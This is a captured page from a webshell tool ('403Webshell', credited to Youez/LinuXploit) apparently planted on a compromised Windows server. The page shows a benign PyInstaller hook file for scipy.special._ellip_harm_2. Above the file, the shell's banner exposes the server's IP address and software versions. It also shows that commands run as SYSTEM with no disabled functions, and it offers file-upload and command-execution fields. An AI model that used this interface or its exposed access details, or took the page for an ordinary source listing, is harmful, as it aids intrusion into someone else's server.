403Webshell
Server IP : 123.56.80.60  /  Your IP : 216.73.216.78
Web Server : Apache/2.4.54 (Win32) OpenSSL/1.1.1s PHP/7.4.33 mod_fcgid/2.3.10-dev
System : Windows NT iZhx3sob14hnz7Z 10.0 build 14393 (Windows Server 2016) i586
User : SYSTEM ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/python/Lib/site-packages/PyInstaller/hooks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/python/Lib/site-packages/PyInstaller/hooks/hook-scipy.special._ellip_harm_2.py
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------

"""
Module hook for the `scipy.special._ellip_harm_2` C extension first introduced
by SciPy >= 0.15.0.

See Also
----------
https://github.com/scipy/scipy/blob/master/scipy/special/_ellip_harm_2.pyx
    This C extension's Cython-based implementation.
"""

# In SciPy >= 0.15.0:
#
# 1. The "scipy.special.__init__" module imports...
# 2. The "scipy.special._ellip_harm" module imports...
# 3. The "scipy.special._ellip_harm_2" C extension imports...
# 4. The "scipy.integrate" package.
#
# The third import is undetectable by PyInstaller and hence explicitly listed.
# Since "_ellip_harm" and "_ellip_harm_2" were first introduced by SciPy 0.15.0,
# the following hidden import will only be applied for versions of SciPy
# guaranteed to provide these modules and C extensions.
hiddenimports = ['scipy.integrate']

Youez - 2016 - github.com/yon3zu
LinuXploit